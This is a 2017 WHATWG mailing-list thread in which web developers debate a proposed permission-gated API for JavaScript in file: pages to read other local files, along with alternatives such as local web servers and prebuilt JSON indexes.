Discussion:
[whatwg] Accessing local files with JavaScript portably and securely
David Kendal
2017-04-09 09:51:14 UTC
Permalink
Moin,

Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers now
have restrictions on the ability of JavaScript in such pages to access
other files.

Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.

This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.

This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
I've filed hundreds of Chrome bugs and I would rather would see this
fixed than any of them
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.

I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even only for development
purposes.


A proposed solution, though far from the only one possible:

There should be a new API something like this:

window.requestFilesystemPermission(requestedOrigin);

which does something like

- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.

- If the current page origin is not a URL on the file: protocol, raise a
permissions error.

- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.

- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.

- If the user chose not to allow access to the files, false is returned
or some other error is raised.

- If they chose to allow access, return true.

- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.

requestedOrigin is allowed to be an absolute or relative URI.

Some useful Fetch semantics for file: URLs should also be defined.

I like this solution because it maintains portability of scripts between
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.

This is also a beneficial property for those using file:// URLs for
development purposes.

Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.


Thanks,
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
<+grr> for security reasons I've switched to files:// urls instead
Melvin Carvalho
2017-04-09 10:11:38 UTC
Permalink
Post by David Kendal
Moin,
Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers now
have restrictions on the ability of JavaScript in such pages to access
other files.
Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
I've filed hundreds of Chrome bugs and I would rather would see this
fixed than any of them
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.
Thanks for the pointer, I just starred this too. I am currently hitting a
wall with this issue as well.

I have looked for a way to override this, but cannot find something. As a
consequence, I have switched to electron, which seems to have this feature.
Post by David Kendal
I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even only for development
purposes.
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise a
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
requestedOrigin is allowed to be an absolute or relative URI.
Some useful Fetch semantics for file: URLs should also be defined.
I like this solution because it maintains portability of scripts between
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.
This is also a beneficial property for those using file:// URLs for
development purposes.
Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.
+1 looks like a good solution. Another way would be to set a flag in the
options.
Post by David Kendal
Thanks,
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
<+grr> for security reasons I've switched to files:// urls instead
Jonathan Zuckerman
2017-04-09 12:23:42 UTC
Permalink
The solution most developers use is to run a simple web server that hosts
static content, it's a much simpler solution than the API you propose and
requires no changes to the spec. It doesn't address the CD-ROM use case,
though..
Post by Melvin Carvalho
Post by David Kendal
Moin,
Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers now
have restrictions on the ability of JavaScript in such pages to access
other files.
Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
I've filed hundreds of Chrome bugs and I would rather would see this
fixed than any of them
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.
Thanks for the pointer, I just starred this too. I am currently hitting a
wall with this issue as well.
I have looked for a way to override this, but cannot find something. As a
consequence, I have switched to electron, which seems to have this feature.
Post by David Kendal
I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even only for development
purposes.
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise a
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
requestedOrigin is allowed to be an absolute or relative URI.
Some useful Fetch semantics for file: URLs should also be defined.
I like this solution because it maintains portability of scripts between
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.
This is also a beneficial property for those using file:// URLs for
development purposes.
Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.
+1 looks like a good solution. Another way would be to set a flag in the
options.
Post by David Kendal
Thanks,
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
<+grr> for security reasons I've switched to files:// urls instead
Philipp Serafin
2017-04-09 13:48:32 UTC
Permalink
Note also that the HTTP server solution requires you to ship a binary (the
server) with your files, therefore sacrificing platform independence and
requiring the user to run an untrusted binary, all just to show some HTML
files.
Post by Jonathan Zuckerman
The solution most developers use is to run a simple web server that hosts
static content, it's a much simpler solution than the API you propose and
requires no changes to the spec. It doesn't address the CD-ROM use case,
though..
Post by Melvin Carvalho
Post by David Kendal
Moin,
Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers
now
Post by Melvin Carvalho
Post by David Kendal
have restrictions on the ability of JavaScript in such pages to access
other files.
Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the
more
Post by Melvin Carvalho
Post by David Kendal
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
I've filed hundreds of Chrome bugs and I would rather would see this
fixed than any of them
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.
Thanks for the pointer, I just starred this too. I am currently hitting
a
Post by Melvin Carvalho
wall with this issue as well.
I have looked for a way to override this, but cannot find something. As
a
Post by Melvin Carvalho
consequence, I have switched to electron, which seems to have this
feature.
Post by Melvin Carvalho
Post by David Kendal
I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even only for development
purposes.
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin
or
Post by Melvin Carvalho
Post by David Kendal
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise
a
Post by Melvin Carvalho
Post by David Kendal
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
requestedOrigin is allowed to be an absolute or relative URI.
Some useful Fetch semantics for file: URLs should also be defined.
I like this solution because it maintains portability of scripts
between
Post by Melvin Carvalho
Post by David Kendal
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.
This is also a beneficial property for those using file:// URLs for
development purposes.
Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.
+1 looks like a good solution. Another way would be to set a flag in the
options.
Post by David Kendal
Thanks,
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
<+grr> for security reasons I've switched to files:// urls instead
David Kendal
2017-04-10 21:43:14 UTC
Permalink
Post by Philipp Serafin
Note also that the HTTP server solution requires you to ship a binary
(the server) with your files, therefore sacrificing platform
independence and requiring the user to run an untrusted binary, all
just to show some HTML files.
This is my main concern with the 'ship a server' approach.

In addition, though local servers are easy for experienced developers to
spin up, it's an extra potentially confusing step for developers who are
brand new to the web platform. It's an additional concept to grasp before
you can even get started, and those should be absolutely minimized.
Beginners may not even have HTTP hosting space of their own yet, and be
dependent on their local filesystem to see their pages.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
A, der edelste, ursprünglichste aller laute, aus brust und kehle voll
erschallend, den das kind zuerst und am leichtesten hervor bringen
lernt, den mit recht die alphabete der meisten sprachen an ihre
spitze stellen. — first entry in the Grimms’ Deutsches Wörterbuch
Jan Tosovsky
2017-04-09 19:36:34 UTC
Permalink
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed so it can be exported as JSON file and then linked via the HTML header in every HTML file where it is needed. This structure is then directly available for the further processing.

However, I am not sure this covers your use case.

Jan
Gregg Tavares
2017-04-09 20:33:27 UTC
Permalink
I know this doesn't address your CD-ROM/USB stick situation but FYI...

for the dev situation there are many *SUPER* simple web servers

https://greggman.github.io/servez/

https://github.com/cortesi/devd/

https://github.com/indexzero/http-server/

https://docs.python.org/2/library/simplehttpserver.html (not recommended,
haven't tried the python 3 one)

https://chrome.google.com/webstore/detail/web-server-for-chrome/ofhbbkphhbklhfoeikjpcbhemlocgigb?hl=en
(soon to be deprecated)

more here
http://stackoverflow.com/questions/12905426/what-is-a-faster-alternative-to-pythons-http-server-or-simplehttpserver
Post by Jan Tosovsky
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed so it can be exported as JSON
file and then linked via the HTML header in every HTML file where it is
needed. This structure is then directly available for the further
processing.
However, I am not sure this covers your use case.
Jan
duanyao
2017-04-12 05:07:50 UTC
Permalink
We should be aware of the security risks when recommand a "simple web
server".

* Most (if not all) simple web servers don't block access from non-local
hosts by default,
which can leak users' files. Although your firewall can block them
for you, users do need unblock
non-local hosts sometimes (e.g. test with a smart phone), so some may
have whitelisted the
server anyway.

* Even if non-local hosts are blocked, non-current users'(in the same
OS) access can't be blocked
easily by a web server. In contrast, file:// access is subject to
file permission check.

* Most (if not all) simple web servers are hobby projects so probabaly
lacks enough security audit.
E.g. How urls like "/foo/../../../bar" are handled to prevent
escaping from the root directory?

Those risks may be non-issue for experienced developers, but do affect
newbie developers
and normal users. So In my opinion, it is much better to improve and
standardize file-url
handling in browsers.

Regards,

Duan, Yao
Post by Gregg Tavares
I know this doesn't address your CD-ROM/USB stick situation but FYI...
for the dev situation there are many *SUPER* simple web servers
https://greggman.github.io/servez/
https://github.com/cortesi/devd/
https://github.com/indexzero/http-server/
https://docs.python.org/2/library/simplehttpserver.html (not recommended,
haven't tried the python 3 one)
https://chrome.google.com/webstore/detail/web-server-for-chrome/ofhbbkphhbklhfoeikjpcbhemlocgigb?hl=en
(soon to be deprecated)
more here
http://stackoverflow.com/questions/12905426/what-is-a-faster-alternative-to-pythons-http-server-or-simplehttpserver
Post by Jan Tosovsky
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed so it can be exported as JSON
file and then linked via the HTML header in every HTML file where it is
needed. This structure is then directly available for the further
processing.
However, I am not sure this covers your use case.
Jan
David Kendal
2017-04-10 21:47:14 UTC
Permalink
Post by Jan Tosovsky
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed so it can be exported as JSON
file and then linked via the HTML header in every HTML file where it
is needed. This structure is then directly available for the further
processing.
However, I am not sure this covers your use case.
I'm not sure either, because I don't understand what you're proposing.
What feature of the HTML header enables this functionality? (For an
arbitrary number of files which may be wanted by an arbitrary number
of other files, and which could be very large.)
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
The House of Commons [is] like Noah’s Ark—a few men & many beasts.
— Samuel Taylor Coleridge
Jan Tosovsky
2017-04-10 22:38:21 UTC
Permalink
Post by David Kendal
Post by Jan Tosovsky
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed so it can be exported as
JSON file and then linked via the HTML header in every HTML file where
it is needed. This structure is then directly available for the further
processing.
However, I am not sure this covers your use case.
I'm not sure either, because I don't understand what you're proposing.
What feature of the HTML header enables this functionality? (For an
arbitrary number of files which may be wanted by an arbitrary number
of other files, and which could be very large.)
Imagine e.g. WebHelp composed of collection of static files with Table of Contents (ToC) in the left pane. It is not very efficient to generate large ToC into every single HTML file. If you extract ToC into a dedicated HTML page, it cannot be imported by standard means directly into another HTML page (analogically to XML Inclusions [1]). You have to use either IFrame, or, better, provide ToC as JSON file. JSON is kind of javascript which can be linked via the <script> tag in the HTML header. It is hence loaded together with the page and you can manipulate it further with javascript. In case of ToC to render data as itemized list with proper CSS classes and even detect if the current item matches the actual page (if so use a different class).

So basically you need
(1) JSON
(2) link to that JSON in your HTML file
(3) JavaScript in your HTML file, which renders JSON data to the page

In my case both WebHelp pages and JSON is generated via XSLT from XML source.

If you have to list the file structure of CD-ROM, I suppose it is fixed so it doesn't need to be determined dynamically, but in advance. I can imagine simple Java 'walker'[2] which could traverse all the folder content and export all necessary data into JSON structure.

Jan


_____________
[1] https://www.w3.org/TR/xinclude/
[2] https://docs.oracle.com/javase/tutorial/essential/io/walk.html
Patrick Dark
2017-04-11 12:04:42 UTC
Permalink
Post by Jan Tosovsky
Post by David Kendal
Post by Jan Tosovsky
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed so it can be exported as
JSON file and then linked via the HTML header in every HTML file where
it is needed. This structure is then directly available for the further
processing.
However, I am not sure this covers your use case.
I'm not sure either, because I don't understand what you're proposing.
What feature of the HTML header enables this functionality? (For an
arbitrary number of files which may be wanted by an arbitrary number
of other files, and which could be very large.)
Imagine e.g. WebHelp composed of collection of static files with Table of Contents (ToC) in the left pane. It is not very efficient to generate large ToC into every single HTML file. If you extract ToC into a dedicated HTML page, it cannot be imported by standard means directly into another HTML page (analogically to XML Inclusions [1]). You have to use either IFrame, or, better, provide ToC as JSON file. JSON is kind of javascript which can be linked via the <script> tag in the HTML header. It is hence loaded together with the page and you can manipulate it further with javascript. In case of ToC to render data as itemized list with proper CSS classes and even detect if the current item matches the actual page (if so use a different class).
So basically you need
(1) JSON
(2) link to that JSON in your HTML file
(3) JavaScript in your HTML file, which renders JSON data to the page
In my case both WebHelp pages and JSON is generated via XSLT from XML source.
If you have to list the file structure of CD-ROM, I suppose it is fixed so it doesn't need to be determined dynamically, but in advance. I can imagine simple Java 'walker'[2] which could traverse all the folder content and export all necessary data into JSON structure.
There's no reason to use JavaScript for displaying a table of contents.
If the file structure is fixed, you can simply hard-code static XML
entries in an XSLT stylesheet.

Granted, Google Chrome won't do XSLT transformations for local files,
but that seems to be more of a browser deficiency than a specification
issue. To accommodate Chrome's deficiency while keeping maintenance down
(i.e., avoiding putting a copy of the TOC in every HTML file), one could
create a standalone index page. That's less convenient than an
XSLT-based navigation panel, but it's doable today.
Jan Tosovsky
2017-04-11 19:22:47 UTC
Permalink
Post by Patrick Dark
Post by Jan Tosovsky
... there are many possible uses for local static files
accessing other local static files: the one I have in mind
is shipping static files on CD-ROM or USB stick...
So basically you need
(1) JSON /* the folder structure stored in JavaScript objects */
(2) link to that JSON in your HTML file
(3) JavaScript in your HTML file, which renders JSON data to the page
In my case both WebHelp pages and JSON is generated via XSLT from XML source.
There's no reason to use JavaScript for displaying a table of contents.
If the file structure is fixed, you can simply hard-code static XML
entries in an XSLT stylesheet.
While slighty off-topic, my goal was to reduce the final HTML file size. The more pages, the larger ToC so the size of the complete set grows exponentially. If ToC is extracted and then just linked in every HTML page, it reduces the total size significantly. If documentation is shipped together with desktop app in the form of installer, it is better to keep it as small as possible.
Post by Patrick Dark
Granted, Google Chrome won't do XSLT transformations for local files,
but that seems to be more of a browser deficiency than a specification
issue.
Sorry not being precise, that mentioned XSLT transformation (for my DocBook XML) is performed once off-the-browser, producing linked static HTML pages (and also JSON with the file hierarchy). I wanted to emphasize that generating JSON can be, in specific cases, nicely integrated into current generating workflow (the file structure is already available in DocBook XSL stylesheets for other purposes so it was quite easy to reuse it for generating JSON for ToC).

Jan
duanyao
2017-04-12 08:39:16 UTC
Permalink
Post by Patrick Dark
Post by Jan Tosovsky
Post by David Kendal
Post by Jan Tosovsky
... there are many possible uses for local static files accessing
other local static files: the one I have in mind is shipping static
files on CD-ROM or USB stick...
In this case the file structure is fixed so it can be exported as
JSON file and then linked via the HTML header in every HTML file where
it is needed. This structure is then directly available for the further
processing.
However, I am not sure this covers your use case.
I'm not sure either, because I don't understand what you're proposing.
What feature of the HTML header enables this functionality? (For an
arbitrary number of files which may be wanted by an arbitrary number
of other files, and which could be very large.)
Imagine e.g. WebHelp composed of collection of static files with
Table of Contents (ToC) in the left pane. It is not very efficient to
generate large ToC into every single HTML file. If you extract ToC
into a dedicated HTML page, it cannot be imported by standard means
directly into another HTML page (analogically to XML Inclusions [1]).
You have to use either IFrame, or, better, provide ToC as JSON file.
JSON is kind of javascript which can be linked via the <script> tag
in the HTML header. It is hence loaded together with the page and you
can manipulate it further with javascript. In case of ToC to render
data as itemized list with proper CSS classes and even detect if the
current item matches the actual page (if so use a different class).
So basically you need
(1) JSON
(2) link to that JSON in your HTML file
(3) JavaScript in your HTML file, which renders JSON data to the page
In my case both WebHelp pages and JSON is generated via XSLT from XML source.
If you have to list the file structure of CD-ROM, I suppose it is
fixed so it doesn't need to be determined dynamically, but in
advance. I can imagine simple Java 'walker'[2] which could traverse
all the folder content and export all necessary data into JSON
structure.
There's no reason to use JavaScript for displaying a table of
contents. If the file structure is fixed, you can simply hard-code
static XML entries in an XSLT stylesheet.
JavaScript and XHR/fetch would be unavoidable if large amount of data
have to be processed, even for local web pages with fixed structure. E.g.:

* Large 3D model files to be used in WebGL.
* Media files not supported by browsers natively, with decoders in js.
E.g. MIDI, WebP, AV1...
* A programming tutorial with many sample codes, and web page
load+parse+format those codes and show them inline.
Sample codes should also be readily edited/compiled directly.
Post by Patrick Dark
Granted, Google Chrome won't do XSLT transformations for local files,
but that seems to be more of a browser deficiency than a specification
issue. To accommodate Chrome's deficiency while keeping maintenance
down (i.e., avoiding putting a copy of the TOC in every HTML file),
one could create a standalone index page. That's less convenient than
an XSLT-based navigation panel, but it's doable today.
Brett Zamir
2017-04-10 03:53:28 UTC
Permalink
I support such an approach and have found the usual "use a server"
response a bit disheartening. Besides the stated cases, I believe it
should just be easy for new programmers, children, etc., to try out
simple projects with nothing more than a browser and text editor (and
the console is not enough).

Another use case is for utility web apps to be shared such as doing text
replacements offline without fears of privacy/security that the text one
pastes can be read (if remote file access can optionally be prevented).

I also support an approach which grants privileges beyond just the
directory where the file is hosted or its subdirectories, as this is too
confining, e.g., if one has used a package manager like npm installing
in root/node_modules, root/examples/index.html could not access it.

FWIW, Firefox previously had support for `enablePrivilege` which allowed
local file access (and other privileged access upon consent of the user)
but was removed: https://bugzilla.mozilla.org/show_bug.cgi?id=546848

I created an add-on, AsYouWish, to allow one to get this support back
but later iterations of Firefox broke the code on which I was relying,
and I was not able to work around the changes. It should be possible,
however, to implement a good of its capabilities now in WebExtensions to
allow reading local files (even optionally from a remote server) upon
user permission though this would not work around the problem of file://
URLs just working as is.

For one subset of the local file usage case (and of less concern,
security-wise), local data files, I also created an add-on WebAppFind
(though I only got to Windows support) which allowed the user to open
local desktop files from one's desktop into a web app without a need for
drag-and-drop from the desktop to the app.

One only needed to double-click a desktop file (or use "Open with..."),
having previously associated the file extension with a binary which
would invoke Firefox with command line arguments that my add-on would
pick up and, reading from a local "filetypes.json" file in the same
directory (or alternatively, with custom web protocols where sites had
previously registered to gain permission to handle certain local file
types), determine which web site had permission to be given the content
and to optionally be allowed to write-back any modified data to the
user's supplied local file as well (all via `window.postMessage`). (The
add-on didn't support arbitrary access to the file system which has some
use cases such as a local file browser or a wiki that can link to one's
local desktop files in a manner that allows opening them, but it at
least allowed web apps to become first-class consumers of one's local data.)

But this add-on also broke with later iterations of Firefox (like so
many other add-ons unlike, imv, the much better-stewarded
backward-compatible web), and I haven't had a chance or energy to update
for WebExtensions, but such an approach might work for you if
implemented as a new add-on pending any adoption by browsers.

Best wishes,

Brett
When replying, please edit your Subject line so it is more specific
than "Re: Contents of whatwg digest..."
When replying to digest messages, please please PLEASE update the subject line so it isn't the digest subject line.
1. Accessing local files with JavaScript portably and securely
(David Kendal)
2. Re: Accessing local files with JavaScript portably and
securely (Melvin Carvalho)
3. Re: Accessing local files with JavaScript portably and
securely (Jonathan Zuckerman)
4. Re: Accessing local files with JavaScript portably and
securely (Philipp Serafin)
----------------------------------------------------------------------
Message: 1
Date: Sun, 9 Apr 2017 11:51:14 +0200
Subject: [whatwg] Accessing local files with JavaScript portably and
securely
Content-Type: text/plain; charset=utf-8
Moin,
Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers now
have restrictions on the ability of JavaScript in such pages to access
other files.
Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
I've filed hundreds of Chrome bugs and I would rather would see this
fixed than any of them
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.
I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even only for development
purposes.
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise a
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
requestedOrigin is allowed to be an absolute or relative URI.
Some useful Fetch semantics for file: URLs should also be defined.
I like this solution because it maintains portability of scripts between
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.
This is also a beneficial property for those using file:// URLs for
development purposes.
Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.
Thanks,
Melvin Carvalho
2017-04-10 22:19:07 UTC
Permalink
Post by David Kendal
Moin,
Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers now
have restrictions on the ability of JavaScript in such pages to access
other files.
Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
I've filed hundreds of Chrome bugs and I would rather would see this
fixed than any of them
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.
I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even only for development
purposes.
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise a
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
requestedOrigin is allowed to be an absolute or relative URI.
Some useful Fetch semantics for file: URLs should also be defined.
I like this solution because it maintains portability of scripts between
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.
This is also a beneficial property for those using file:// URLs for
development purposes.
Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.
I thought I'd share this design issues note by Tim Berners-Lee, on this
topic, which some my find interesting

https://www.w3.org/DesignIssues/HTTPFilenameMapping.html

"It is actually pretty interesting to live on the edge, or more
specifically on the intersection of these worlds where you can address the
same files both as local files and as resources on the web. Why do both?
Well, different things work better in different worlds"
Post by David Kendal
Thanks,
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
<+grr> for security reasons I've switched to files:// urls instead
Patrick Dark
2017-04-11 11:55:26 UTC
Permalink
Post by David Kendal
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
I can't see this being addressed. The only good reason to distribute an
application this way is because you want it to be confidential and
there's no incentive to accommodate what one might call "walled gardens"
in HTML because they naturally have a limited audience. For example, if
your application is being distributed via CD, that implies that that
number of application instances will be limited to the number of
physical media items, that the application will never be updated, and
that the application therefore isn't particularly important.

If you really want a private HTML-based application, you might consider
a password-protected webpage. If the application isn't a throwaway app,
you'll want to do that anyway, so there isn't anything lost from the
upkeep required of maintaining an online server.

As for development, it's trivial to install a local server using an
offering like XAMPP and this gives you the power to test things like URL
redirects that you can't test otherwise.
Philipp Serafin
2017-04-11 12:50:01 UTC
Permalink
[...] The only good reason to distribute an application this way is
because you want it to be confidential [...]
Another use-case would be to develop a HTML app that does not require
